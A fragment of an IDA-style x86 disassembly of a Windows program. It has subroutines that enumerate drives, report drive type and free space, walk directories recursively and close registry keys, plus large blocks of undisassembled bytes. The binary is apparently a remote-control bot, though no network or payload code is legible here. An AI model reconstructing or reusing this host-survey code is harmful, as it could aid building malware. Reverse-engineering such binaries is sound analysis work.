push eax
push dword ptr [esi-4]
lea eax, [ebp+var_2F0]
push edi
push eax
call sub_41E6A6
push ebx
push [ebp+arg_8]
lea eax, [ebp+var_2F0]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40123B
lea eax, [ebp+var_2F0]
push eax
call sub_417D70
add esp, 28h
loc_41877D: ; CODE XREF: sub_4185EA+60�j
; sub_4185EA+A2�j ...
push [ebp+var_4]
call ds:dword_4441E8 ; RegCloseKey
add esi, 18h
lea eax, [esi-0Ch]
cmp [eax], ebx
jnz loc_41861A
pop edi
pop esi
loc_418796: ; CODE XREF: sub_4185EA+19�j
pop ebx
leave
retn
sub_4185EA endp
; ---------------------------------------------------------------------------
byte_418799 db 55h, 0B8h, 0B4h ; DATA XREF: sub_40274D+934�o
dd 8D000011h, 0E88C246Ch, 6278h, 537C458Bh, 6D6A5756h
dd 8DF08B59h, 0FFFEC0BDh, 0FFA5F3FFh, 0FF336075h, 0B0B88947h
dd 8D000001h, 0FFFEC885h, 0F3E850FFh, 8B000019h, 0FFFE83F0h
dd 75895959h, 8D4E757Ch, 0FFEEC085h, 6A9868FFh, 0E8500043h
dd 5EB6h, 5D39DB33h, 7559596Ch, 75FF5318h, 0C0858D68h
dd 50FFFFEEh, 50E0458Dh, 8A2DE856h, 0C483FFFEh, 0C0858D14h
dd 50FFFFEEh, 0FFF553E8h, 6475FFFFh, 0FF2924E8h, 575959FFh
dd 122E9h, 0B6336800h, 0E8560042h, 419Ch, 59FFF883h, 8D507559h
dd 0FFEEC085h, 6A6868FFh, 0E8500043h, 5E56h, 5D39DB33h
dd 7559596Ch, 75FF5318h, 0C0858D68h, 50FFFFEEh, 50E0458Dh
dd 89CDE856h, 0C483FFFEh, 0C0858D14h, 50FFFFEEh, 0FFF4F3E8h
dd 0FF5659FFh, 44421815h, 6475FF00h, 0FF28BCE8h, 8B97EBFFh
dd 42B0143Dh, 0FF646A00h, 1000BED7h, 0DB330000h, 858D34EBh
dd 0FFFFEEC0h, 42CC6468h, 1DE85000h, 8D000066h, 0FFEEC085h
dd 0FEE850FFh, 8300003Eh, 0C0850CC4h, 646A3774h, 0A6AD7FFh
dd 0FF27A4E8h, 59C085FFh, 8D562774h, 0FFEEC085h, 0E85053FFh
dd 5D0Ch, 530CC483h, 0C0858D56h, 50FFFFEEh, 0FF7C75FFh
dd 44406415h, 7FC08500h, 0C0858DA5h, 68FFFFEEh, 436A34h
dd 5D98E850h, 5D390000h, 7559596Ch, 75FF531Ah, 0C0858D68h
dd 50FFFFEEh, 50E0458Dh, 0E87C75FFh, 0FFFE890Fh, 8D14C483h
dd 0FFEEC085h, 35E850FFh, 59FFFFF4h, 0FF7C75FFh, 44421815h
dd 6475FF00h, 0FF27FCE8h, 0FF5359FFh, 42B06815h
db 0, 0CCh
word_418956 dw 8D55h ; DATA XREF: sub_40274D+7452�o
dd 818C246Ch, 0A04ECh, 7C458B00h, 6A575653h, 0F08B596Dh
dd 0FE78BD8Dh, 0A5F3FFFFh, 0DB33F633h, 6A534356h, 0B0988902h
dd 89000001h, 75896475h, 54758968h, 410015FFh, 0F88B0044h
dd 89FFFF83h, 0A755C7Dh, 436B9868h, 1B3E900h, 106A0000h
dd 5644458Dh, 5C3EE850h, 0C4830000h, 0C766560Ch, 24445h
dd 426015FFh, 89660044h, 106A4645h, 5044458Dh, 48758957h
dd 41E415FFh, 0C0850044h, 74680A74h, 0E900436Bh, 175h
dd 5058458Dh, 5044458Dh, 5845C757h, 10h, 406815FFh, 75FF0044h
dd 15FF46h, 89004442h, 45897C75h, 94858D70h, 50FFFFFEh
dd 57ABE8h, 4D8B5900h, 0D848A7Ch, 0FFFFFE94h, 575203Ch
dd 0EB585F6Ah, 0C0BE0F03h, 700D8488h, 8DFFFFFAh, 0FFFE9485h
dd 895041FFh, 7DE87C4Dh, 39000057h, 76597C45h, 0FF5753CDh
dd 44423015h, 74C08500h, 6A98680Ah, 0FAE90043h, 56000000h
dd 56036A56h, 6853h, 858D8000h, 0FFFFFE94h, 8C15FF50h
dd 830042B0h, 4589FFF8h, 680A756Ch, 436B54h, 0D0E9h, 0FF505600h
dd 42B0BC15h, 45895000h, 45B70F7Ch, 0B5FF5070h, 0FFFFFE78h
dd 0FE9924E8h, 0FF5059FFh, 44417C15h, 15FF5000h, 444234h
dd 94858D50h, 50FFFFFEh, 0FC78858Dh, 3C68FFFFh, 5000436Bh
dd 5BD9E8h, 8D565600h, 0FFFC7885h, 458D50FFh, 0B5FF5098h
dd 0FFFFFE78h, 0FE8756E8h, 2CC483FFh, 503C458Dh, 858D5656h
dd 0FFFFFB74h, 45C75650h, 3C3Ch, 40758900h, 0FB78BD89h
dd 9D89FFFFh, 0FFFFFB74h, 41B015FFh, 0C0850044h, 0FF561D7Fh
dd 458D2075h, 6B246898h, 0FF500043h, 0FFFE78B5h, 870DE8FFh
dd 24E9FFFEh, 8D000001h, 8D506045h, 57502C45h, 106045C7h
dd 0FF000000h, 4440BC15h, 0FFF88300h, 0FE7C8589h, 1875FFFFh
dd 436B0068h, 78858D00h, 50FFFFFCh, 5B41E8h, 0E9595900h
dd 0EEh, 1815FF57h, 39004442h, 840F7C75h, 0A2h, 400BFh
dd 7C458B00h, 7D89C73Bh, 89037D70h, 8D577045h, 0FFF67085h
dd 0E85056FFh, 5A54h, 837C458Bh, 26A0CC4h, 50D8F756h, 0FF6C75FFh
dd 42B0B815h, 458D5600h, 75FF5054h, 70858D70h, 50FFFFF6h
dd 0FF6C75FFh, 42B08015h, 75FF5600h, 70858D70h, 50FFFFF6h
dd 0FE7CB5FFh, 15FFFFFFh, 4441A0h, 99704589h, 56644501h
dd 68551157h, 0F670858Dh, 0FF50FFFFh, 0FFFE7CB5h, 6415FFFFh
dd 3B004440h, 0A98C0FC3h, 8B000000h, 0C33B7045h, 9E8C0Fh
dd 45290000h, 66850F7Ch, 8BFFFFFFh, 75FF5C7Dh, 415FF6Ch
dd 0FF0042B0h, 75FF6875h, 811E864h, 59590000h, 3075FF50h
dd 418815FFh, 8D500044h, 0FFFE9485h, 858D50FFh, 0FFFFFC78h
dd 436AD468h, 4FE85000h, 8300005Ah, 753914C4h, 561D7524h
dd 8D2075FFh, 0FFFC7885h, 458D50FFh, 0B5FF5098h, 0FFFFFE78h
dd 0FE85C2E8h, 14C483FFh, 0FC78858Dh, 0E850FFFFh, 0FFFFF0E8h
dd 7659FE3Bh, 15FF5707h, 444218h, 0FE7CB5FFh, 15FFFFFFh
dd 444218h, 0E81C75FFh, 0FFFF24A1h, 15FF5659h, 42B068h
dd 2075FF56h, 436ABCBEh, 458D5600h, 0B5FF5098h, 0FFFFFE78h
dd 0FE8572E8h, 0A1E856FFh, 83FFFFF0h, 0B5FF18C4h, 0FFFFFE7Ch
dd 421815FFh, 75FF0044h, 2463E81Ch, 5359FFFFh
db 0EBh, 0C0h
word_418CEA dw 0B855h ; DATA XREF: sub_40274D+6FE�o
dd 14C4h, 8C246C8Dh, 5D27E8h, 7C458B00h, 6A575653h, 0F08B596Dh
dd 0FEB4BD8Dh, 0A5F3FFFFh, 8946F633h, 1B0B0h, 1046800h
dd 858D0000h, 0FFFFFDB0h, 8950DB33h, 15FF6C5Dh, 42B010h
dd 0FED0858Dh, 8D50FFFFh, 0FFFDB085h, 0DC6850FFh, 500042FDh
dd 5961E8h, 10C48300h, 806853h, 26A0000h, 685653h, 8D400000h
dd 0FFFDB085h, 15FF50FFh, 42B08Ch, 75FFF883h, 6C386807h
dd 46EB0043h, 415FF50h, 8D0042B0h, 0FFFDB085h, 6C3468FFh
dd 0E8500043h, 57C6h, 5959C33Bh, 75704589h, 6C086807h
dd 1EEB0043h, 8D5475FFh, 0FFFEBC85h, 1FE850FFh, 83000014h
dd 5959FFF8h, 757C4589h, 6BE86818h, 858D0043h, 0FFFFFBB0h
dd 58E4E850h, 59590000h, 0F6E9h, 1000BE00h, 8D560000h
dd 0FFEBB085h, 0E85053FFh, 5814h, 530CC483h, 0B0858D56h
dd 50FFFFEBh, 0FF7C75FFh, 44406415h, 3BF88B00h, 96840FFBh
dd 83000000h, 3674FFFFh, 8D7075FFh, 0FFEBB085h, 16A57FFh
dd 7972E850h, 7D010000h, 10C4836Ch, 0FF6C75FFh, 44423415h
dd 45895300h, 8D046A68h, 0FF506845h, 15FF7C75h, 4441A0h
dd 858D98EBh, 0FFFFFBB0h, 436ABC68h, 5FE85000h, 53000058h
dd 8D5C75FFh, 0FFFBB085h, 458D50FFh, 0B5FF50D4h, 0FFFFFEB4h
dd 0FE83DAE8h, 0B0858DFFh, 50FFFFFBh, 0FFEF03E8h, 7075FFFFh
dd 53D6E8h, 24C48300h, 0FF7C75FFh, 44421815h, 5875FF00h
dd 0FF22C0E8h, 16A59FFh, 83E9h, 6C458B00h, 0E8505299h
dd 5A7h, 0BC858D50h, 50FFFFFEh, 0FED0858Dh, 8D50FFFFh
dd 0FFFBB085h, 6BBC68FFh, 0E8500043h, 57EAh, 391CC483h
dd 1D75605Dh, 5C75FF53h, 0FBB0858Dh, 8D50FFFFh, 0FF50D445h
dd 0FFFEB4B5h, 835DE8FFh, 0C483FFFEh, 0B0858D14h, 50FFFFFBh
dd 0FFEE83E8h, 705D39FFh, 0FF097459h, 50E87075h, 59000053h
dd 767C5D39h, 7C75FF09h, 421815FFh, 75FF0044h, 2237E858h
dd 5359FFFFh, 0B06815FFh, 8BCC0042h, 33042444h, 244C39C9h
dd 8A107E08h, 43C08C15h, 1143000h, 244C3B41h, 0C3F07C08h
dword_418F38 dd 246C8D55h, 14EC818Ch, 8B000005h, 56537C45h, 0B9F08B57h
; DATA XREF: sub_40274D+5F78�o
; sub_40274D+6799�o
dd 0AAh, 0FD60BD8Dh, 0A5F3FFFFh, 5656F633h, 4756FF33h
dd 2A4B889h, 8D560000h, 0FFFDE485h, 35FF50FFh, 444254h
dd 410815FFh, 0C63B0044h, 0F644589h, 43D84h, 6A565600h
dd 68565602h, 40000000h, 0FEE4858Dh, 0FF50FFFFh, 42B08C15h
dd 89C73B00h, 5A736045h, 0FEE4858Dh, 8D50FFFFh, 0FFFB6085h
dd 6E0C68FFh, 0E8500043h, 56EAh, 390CC483h, 2075FC75h
dd 75FF56h, 0FB60858Dh, 8D50FFFFh, 0FFFD6485h, 0B5FF50FFh
dd 0FFFFFD60h, 0FE825AE8h, 14C483FFh, 0FB60858Dh, 0E850FFFFh
dd 0FFFFED80h, 0E8E475FFh, 0FFFF2151h, 422E959h, 0FF330000h
dd 0B03815FFh, 0BB0042h, 530007D0h, 0E8704589h, 55BFh
dd 68458959h, 20068h, 60858D00h, 56FFFFFBh, 55C6E850h
dd 0C4830000h, 7C458D0Ch, 2006850h, 858D0000h, 0FFFFFB60h
dd 6475FF50h, 41B815FFh, 75390044h, 0FF1174F8h, 858D7C75h
dd 0FFFFFB60h, 0FEC1E850h, 5959FFFFh, 5C458D56h, 7C75FF50h
dd 0FB60858Dh, 0FF50FFFFh, 15FF6075h, 42B084h, 2273FB3Bh
dd 0C72BC38Bh, 767C453Bh, 7C458B03h, 60858D50h, 50FFFFFBh
dd 368458Bh, 69E850C7h, 83000063h, 7D030CC4h, 0F075397Ch
dd 7D3B0574h, 8B3F77F0h, 0AE8C1C7h, 0E4858D50h, 50FFFFFDh
dd 69E4458Bh, 234C0h, 42E80500h, 7D830044h, 77401E8h, 436DE468h
dd 6805EB00h, 436DBCh, 55CCE850h, 0C4830000h, 7C753910h
dd 0FF32870Fh, 7539FFFFh, 6C45C7F0h, 1, 7D3B4974h, 0FF4474F0h
dd 858DF075h, 0FFFFFB60h, 6D906857h, 89500043h, 97E86C75h
dd 56000055h, 8D0075FFh, 0FFFB6085h, 858D50FFh, 0FFFFFD64h
dd 60B5FF50h, 0E8FFFFFDh, 0FFFE810Fh, 0FB60858Dh, 0E850FFFFh
dd 0FFFFEC38h, 0FF28C483h, 42B03815h, 70452B00h, 0E8B9D233h
dd 0F7000003h, 0FFD233F1h, 0C88B6075h, 0F7C78B41h, 0FFD88BF1h
dd 42B00415h, 6875FF00h, 5138E8h, 0F4753900h, 8D567459h
dd 0FFFEE485h, 24E850FFh, 3BFFFE7Fh, 7459F445h, 0F475FF44h
dd 506C7589h, 0FB60858Dh, 6868FFFFh, 5000436Dh, 550DE8h
dd 75FF5600h, 60858D00h, 50FFFFFBh, 0FD64858Dh, 0FF50FFFFh
dd 0FFFD60B5h, 8085E8FFh, 858DFFFEh, 0FFFFFB60h, 0EBAEE850h
dd 0C483FFFFh, 6C753928h, 241840Fh, 7D830000h, 840F01E8h
dd 0F6h, 5D89DB85h, 7045DB70h, 5DC067Dh, 433088h, 0DDCFF85h
dd 436D60h, 1CDD5151h, 0E4858D24h, 89FFFFFEh, 45DB707Dh
dd 67D5070h, 308805DCh, 0DDC0043h, 436D60h, 858D5151h
dd 0FFFFFB60h, 68241CDDh, 436D28h, 5480E850h, 0C4830000h
dd 0FC75391Ch, 0FF562075h, 858D0075h, 0FFFFFB60h, 64858D50h
dd 50FFFFFDh, 0FD60B5FFh, 0F0E8FFFFh, 83FFFE7Fh, 858D14C4h
dd 0FFFFFB60h, 0EB16E850h, 7D83FFFFh, 0F5901ECh, 1AA85h
dd 56056A00h, 0E4858D56h, 50FFFFFEh, 42E5B868h, 15FF5600h
dd 444214h, 0FFC7539h, 18A85h, 0E4858D00h, 50FFFFFEh, 0FB60858Dh
dd 0C68FFFFh, 5000436Dh, 5409E8h, 75FF5600h, 60858D00h
dd 50FFFFFBh, 0FD64858Dh, 0FF50FFFFh, 0FFFD60B5h, 7F81E8FFh
dd 858DFFFEh, 0FFFFFB60h, 0EAAAE850h, 0C483FFFFh, 141E924h
dd 0DB850000h, 0DB705D89h, 67D7045h, 308805DCh, 0FF850043h
dd 6D600DDCh, 51510043h, 8D241CDDh, 0FFFEE485h, 707D89FFh
dd 507045DBh, 5DC067Dh, 433088h, 6D600DDCh, 51510043h
dd 0FB60858Dh, 1CDDFFFFh, 6CC86824h, 0E8500043h, 538Ah
dd 391CC483h, 2075FC75h, 75FF56h, 0FB60858Dh, 8D50FFFFh
dd 0FFFD6485h, 0B5FF50FFh, 0FFFFFD60h, 0FE7EFAE8h, 14C483FFh
dd 0FB60858Dh, 0E850FFFFh, 0FFFFEA20h, 458D106Ah, 0E850564Ch
dd 5294h, 575F446Ah, 5608458Dh, 5286E850h, 0C4830000h
dd 4C458D1Ch, 8458D50h, 6A565650h, 89565628h, 8D56087Dh
dd 0FFFEE485h, 50FF33FFh, 45C75647h, 42B63314h, 347D8900h
dd 38758966h, 0B00815FFh, 0C73B0042h, 15FF1275h, 444224h
dd 1B30E8h, 15FF5600h, 42B000h, 0FEE4858Dh, 6850FFFFh
dd 436C94h, 858D0CEBh, 0FFFFFDE4h, 6C686850h, 858D0043h
dd 0FFFFFB60h, 52CCE850h, 0C4830000h, 0FC75390Ch, 0FF562075h
dd 858D0075h, 0FFFFFB60h, 64858D50h, 50FFFFFDh, 0FD60B5FFh
dd 3CE8FFFFh, 83FFFE7Eh, 858D14C4h, 0FFFFFB60h, 0E962E850h
dd 0FF59FFFFh, 15FF6475h, 444164h, 0E8E475FFh, 0FFFF1D29h
dd 15FF5659h, 42B068h
db 0CCh
; =============== S U B R O U T I N E =======================================
sub_419429 proc near ; CODE XREF: sub_40274D+5554�p
; sub_40274D+5693�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_42065F
pop ecx
pop ecx
xor ecx, ecx
cmp eax, 0FFFFFFFFh
setnz cl
mov eax, ecx
retn
sub_419429 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419443 proc near ; CODE XREF: sub_412135+462�p
; sub_412135+5FE�p ...
var_40 = byte ptr -40h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 40h
and [ebp+var_4], 0
push esi
push edi
push 32h
push 0
mov edi, offset dword_4DA12C
push edi
call sub_41E5F0
add esp, 0Ch
lea esi, [ebp+var_40]
push ebx
loc_419465: ; CODE XREF: sub_419443+52�j
; sub_419443+58�j
push 0
push 0Ah
push [ebp+arg_4]
push [ebp+arg_0]
call sub_420890
add cl, 30h
mov [esi], cl
inc esi
mov [ebp+arg_0], eax
or eax, edx
mov [ebp+var_8], ebx
mov [ebp+arg_4], edx
jz short loc_41949D
inc [ebp+var_4]
mov eax, [ebp+var_4]
push 3
cdq
pop ecx
idiv ecx
test edx, edx
jnz short loc_419465
mov byte ptr [esi], 2Ch
inc esi
jmp short loc_419465
; ---------------------------------------------------------------------------
loc_41949D: ; CODE XREF: sub_419443+42�j
mov eax, edi
pop ebx
jmp short loc_4194A7
; ---------------------------------------------------------------------------
loc_4194A2: ; CODE XREF: sub_419443+6A�j
mov cl, [esi]
mov [eax], cl
inc eax
loc_4194A7: ; CODE XREF: sub_419443+5D�j
dec esi
lea ecx, [ebp+var_40]
cmp esi, ecx
jnb short loc_4194A2
mov byte ptr [eax], 0
mov eax, edi
pop edi
pop esi
leave
retn
sub_419443 endp
; =============== S U B R O U T I N E =======================================
sub_4194B8 proc near ; CODE XREF: sub_419664+40�p
; sub_419664+76�p
arg_0 = dword ptr 4
push [esp+arg_0]
call ds:dword_44407C ; GetDriveTypeA
sub eax, 0
jz short loc_4194FB
dec eax
jz short loc_4194F5
dec eax
dec eax
jz short loc_4194EF
dec eax
jz short loc_4194E9
dec eax
jz short loc_4194E3
dec eax
jz short loc_4194DD
mov eax, offset dword_436E60
retn
; ---------------------------------------------------------------------------
loc_4194DD: ; CODE XREF: sub_4194B8+1D�j
mov eax, offset off_436E5C
retn
; ---------------------------------------------------------------------------
loc_4194E3: ; CODE XREF: sub_4194B8+1A�j
mov eax, offset aCdrom ; "Cdrom"
retn
; ---------------------------------------------------------------------------
loc_4194E9: ; CODE XREF: sub_4194B8+17�j
mov eax, offset aNetwork ; "Network"
retn
; ---------------------------------------------------------------------------
loc_4194EF: ; CODE XREF: sub_4194B8+14�j
mov eax, offset aDisk ; "Disk"
retn
; ---------------------------------------------------------------------------
loc_4194F5: ; CODE XREF: sub_4194B8+10�j
mov eax, offset aInvalid ; "Invalid"
retn
; ---------------------------------------------------------------------------
loc_4194FB: ; CODE XREF: sub_4194B8+D�j
mov eax, offset aUnknown ; "Unknown"
retn
sub_4194B8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419501 proc near ; CODE XREF: sub_419549+12�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 18h
or eax, 0FFFFFFFFh
mov [ebp+var_18], eax
mov [ebp+var_14], eax
mov [ebp+var_10], eax
mov [ebp+var_C], eax
mov [ebp+var_8], eax
mov [ebp+var_4], eax
mov eax, ds:dword_4440FC
test eax, eax
jz short loc_419536
lea ecx, [ebp+var_10]
push ecx
lea ecx, [ebp+var_8]
push ecx
lea ecx, [ebp+var_18]
push ecx
push [ebp+arg_4]
call eax ; GetDiskFreeSpaceExA
loc_419536: ; CODE XREF: sub_419501+22�j
mov eax, [ebp+arg_0]
push esi
push edi
push 6
pop ecx
lea esi, [ebp+var_18]
mov edi, eax
rep movsd
pop edi
pop esi
leave
retn
sub_419501 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419549 proc near ; CODE XREF: sub_419664+17�p
; sub_41D779+1C2�p
var_1B0 = byte ptr -1B0h
var_130 = byte ptr -130h
var_B0 = byte ptr -0B0h
var_30 = byte ptr -30h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 1B0h
push esi
push edi
push [ebp+arg_4]
lea eax, [ebp+var_30]
push eax
call sub_419501
pop ecx
pop ecx
push 6
mov esi, eax
pop ecx
lea edi, [ebp+var_18]
rep movsd
mov eax, [ebp+var_18]
and eax, [ebp+var_14]
cmp eax, 0FFFFFFFFh
jz loc_419621
mov eax, [ebp+var_10]
and eax, [ebp+var_C]
cmp eax, 0FFFFFFFFh
jz loc_419621
mov eax, [ebp+var_8]
and eax, [ebp+var_4]
cmp eax, 0FFFFFFFFh
jz loc_419621
push ebx
push 0
mov ebx, 400h
push ebx
push [ebp+var_14]
push [ebp+var_18]
call sub_420930
push edx
push eax
call sub_419443
push eax
mov edi, offset aSkb ; "%sKB"
push edi
mov esi, 80h
lea eax, [ebp+var_1B0]
push esi
push eax
call sub_41E6FE
add esp, 18h
push 0
push ebx
push [ebp+var_C]
push [ebp+var_10]
call sub_420930
push edx
push eax
call sub_419443
push eax
push edi
lea eax, [ebp+var_130]
push esi
push eax
call sub_41E6FE
add esp, 18h
push 0
push ebx
push [ebp+var_4]
push [ebp+var_8]
call sub_420930
push edx
push eax
call sub_419443
push eax
push edi
lea eax, [ebp+var_B0]
push esi
push eax
call sub_41E6FE
add esp, 18h
pop ebx
jmp short loc_419650
; ---------------------------------------------------------------------------
loc_419621: ; CODE XREF: sub_419549+2C�j
; sub_419549+3B�j ...
mov esi, offset aFailed ; "failed"
lea eax, [ebp+var_1B0]
push esi
push eax
call sub_41E6A6
lea eax, [ebp+var_130]
push esi
push eax
call sub_41E6A6
lea eax, [ebp+var_B0]
push esi
push eax
call sub_41E6A6
add esp, 18h
loc_419650: ; CODE XREF: sub_419549+D6�j
mov eax, [ebp+arg_0]
push 60h
pop ecx
lea esi, [ebp+var_1B0]
mov edi, eax
rep movsd
pop edi
pop esi
leave
retn
sub_419549 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419664 proc near ; CODE XREF: sub_419725+D�j
; sub_419725+51�p
var_500 = byte ptr -500h
var_380 = byte ptr -380h
var_180 = byte ptr -180h
var_100 = byte ptr -100h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 500h
push ebx
mov ebx, [ebp+arg_C]
push esi
push edi
lea eax, [ebp+var_500]
push ebx
push eax
call sub_419549
push 60h
pop ecx
mov esi, eax
lea eax, [ebp+var_80]
push offset aFailed ; "failed"
lea edi, [ebp+var_180]
push eax
rep movsd
call sub_41E990
add esp, 10h
test eax, eax
jnz short loc_4196C6
push ebx
push ebx
call sub_4194B8
pop ecx
push eax
push offset unk_436EB0
lea eax, [ebp+var_380]
push 200h
push eax
call sub_41E6FE
add esp, 14h
jmp short loc_4196FA
; ---------------------------------------------------------------------------
loc_4196C6: ; CODE XREF: sub_419664+3C�j
lea eax, [ebp+var_180]
push eax
lea eax, [ebp+var_100]
push eax
lea eax, [ebp+var_80]
push eax
push ebx
push ebx
call sub_4194B8
pop ecx
push eax
push offset unk_436E74
lea eax, [ebp+var_380]
push 200h
push eax
call sub_41E6FE
add esp, 20h
loc_4196FA: ; CODE XREF: sub_419664+60�j
push 1
push [ebp+arg_8]
lea eax, [ebp+var_380]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40123B
lea eax, [ebp+var_380]
push eax
call sub_417D70
add esp, 18h
pop edi
pop esi
pop ebx
leave
retn
sub_419664 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419725 proc near ; CODE XREF: sub_40274D+2360�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
xor ebx, ebx
cmp [ebp+arg_C], ebx
jz short loc_419737
pop ebx
pop ebp
jmp sub_419664
; ---------------------------------------------------------------------------
loc_419737: ; CODE XREF: sub_419725+9�j
push esi
push edi
push ebx
push ebx
call ds:dword_4441A8 ; GetLogicalDriveStringsA
lea esi, [eax+2]
push esi
call sub_41E5D3
pop ecx
mov edi, eax
push edi
push esi
call ds:dword_4441A8 ; GetLogicalDriveStringsA
cmp [edi], bl
mov esi, edi
jz short loc_41978D
loc_41975B: ; CODE XREF: sub_419725+66�j
push offset aA_1 ; "A:\\"
push esi
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz short loc_41977E
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_419664
add esp, 10h
loc_41977E: ; CODE XREF: sub_419725+45�j
push esi
call sub_41E1C0
lea esi, [esi+eax+1]
cmp [esi], bl
pop ecx
jnz short loc_41975B
loc_41978D: ; CODE XREF: sub_419725+34�j
push edi
call sub_41E2A1
pop ecx
pop edi
pop esi
pop ebx
pop ebp
retn
sub_419725 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419799 proc near ; CODE XREF: sub_419799+9E�p
var_54C = byte ptr -54Ch
var_34C = byte ptr -34Ch
var_248 = byte ptr -248h
var_144 = byte ptr -144h
var_118 = byte ptr -118h
var_117 = byte ptr -117h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 54Ch
push ebx
push esi
push edi
push [ebp+arg_10]
mov esi, 104h
push offset aS_3 ; "%s\\*"
lea eax, [ebp+var_248]
push esi
push eax
call sub_41E6FE
mov edi, ds:dword_42B0B4
add esp, 10h
lea eax, [ebp+var_144]
push eax
lea eax, [ebp+var_248]
push eax
call edi ; FindFirstFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
mov ebx, offset aSS_0 ; "%s\\%s"
jz short loc_419856
loc_4197E5: ; CODE XREF: sub_419799+BB�j
test [ebp+var_144], 10h
jz short loc_419842
cmp [ebp+var_118], 2Eh
jnz short loc_419809
cmp [ebp+var_117], 0
jz short loc_419842
cmp [ebp+var_117], 2Eh
jz short loc_419842
loc_419809: ; CODE XREF: sub_419799+5C�j
lea eax, [ebp+var_118]
push eax
push [ebp+arg_10]
lea eax, [ebp+var_34C]
push ebx
push esi
push eax
call sub_41E6FE
push [ebp+arg_14]
lea eax, [ebp+var_34C]
push eax
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_419799
add esp, 2Ch
mov [ebp+arg_14], eax
loc_419842: ; CODE XREF: sub_419799+53�j
; sub_419799+65�j ...
lea eax, [ebp+var_144]
push eax
push [ebp+var_4]
call ds:dword_42B0B0 ; FindNextFileA
test eax, eax
jnz short loc_4197E5
loc_419856: ; CODE XREF: sub_419799+4A�j
push [ebp+var_4]
call ds:dword_42B0A4 ; FindClose
push [ebp+arg_C]
lea eax, [ebp+var_248]
push [ebp+arg_10]
push ebx
push esi
push eax
call sub_41E6FE
add esp, 14h
lea eax, [ebp+var_144]
push eax
lea eax, [ebp+var_248]
push eax
call edi ; FindFirstFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_4198DC
loc_41988D: ; CODE XREF: sub_419799+141�j
inc [ebp+arg_14]
lea eax, [ebp+var_118]
push eax
push [ebp+arg_10]
lea eax, [ebp+var_54C]
push offset dword_436EF0
push 200h
push eax
call sub_41E6FE
push 1
push [ebp+arg_8]
lea eax, [ebp+var_54C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40123B
add esp, 28h
lea eax, [ebp+var_144]
push eax
push esi
call ds:dword_42B0B0 ; FindNextFileA
test eax, eax
jnz short loc_41988D
loc_4198DC: ; CODE XREF: sub_419799+F2�j
push esi
call ds:dword_42B0A4 ; FindClose
mov eax, [ebp+arg_14]
pop edi
pop esi
pop ebx
leave
retn
sub_419799 endp
; ---------------------------------------------------------------------------
byte_4198EB db 55h ; DATA XREF: sub_40274D+6585�o
dd 8C246C8Dh, 49CEC81h, 458B0000h, 5756537Ch, 0A7B9F08Bh
dd 8D000000h, 0FFFDD8BDh, 0C7A5F3FFh, 29880h, 100h, 60858D00h
dd 50FFFFFFh, 489FE8h, 80DB3300h, 0FF5F05BCh, 595CFFFFh
dd 858D1475h, 0FFFFFF60h, 4886E850h, 88590000h, 0FF5F059Ch
dd 858DFFFFh, 0FFFFFE5Ch, 6F346850h, 858D0043h, 0FFFFFBD8h
dd 20068h, 9FE85000h, 8300004Dh, 5D3910C4h, 5320756Ch
dd 8D6875FFh, 0FFFBD885h, 858D50FFh, 0FFFFFDDCh, 0D8B5FF50h
dd 0E8FFFFFDh, 0FFFE78B7h, 5314C483h, 0FF60858Dh, 8D50FFFFh
dd 0FFFE5C85h, 75FF50FFh, 0DC858D68h, 50FFFFFDh, 0FDD8B5FFh
dd 0EEE8FFFFh, 50FFFFFDh, 0FBD8858Dh, 1468FFFFh, 5000436Fh
dd 4CE9E8h, 24C48300h, 756C5D39h, 75FF5320h, 0D8858D68h
dd 50FFFFFBh, 0FDDC858Dh, 0FF50FFFFh, 0FFFDD8B5h, 7859E8FFh
dd 0C483FFFEh, 0D8858D14h, 50FFFFFBh, 0FFE37FE8h, 6475FFFFh
dd 0FF1750E8h, 535959FFh, 0B06815FFh, 83CC0042h, 648318ECh
dd 83001424h, 42464h, 8B565553h, 42B0E835h, 0BB5700h, 53000001h
dd 0D6FF086Ah, 0B0E43D8Bh, 0FF500042h, 8DE88BD7h, 50142444h
dd 106A5553h, 0A96015FFh, 6A55004Dh, 50D6FF00h, 0B0E015FFh
dd 74FF0042h, 86A1424h, 0FF50D6FFh, 8BE88BD7h, 8D142444h
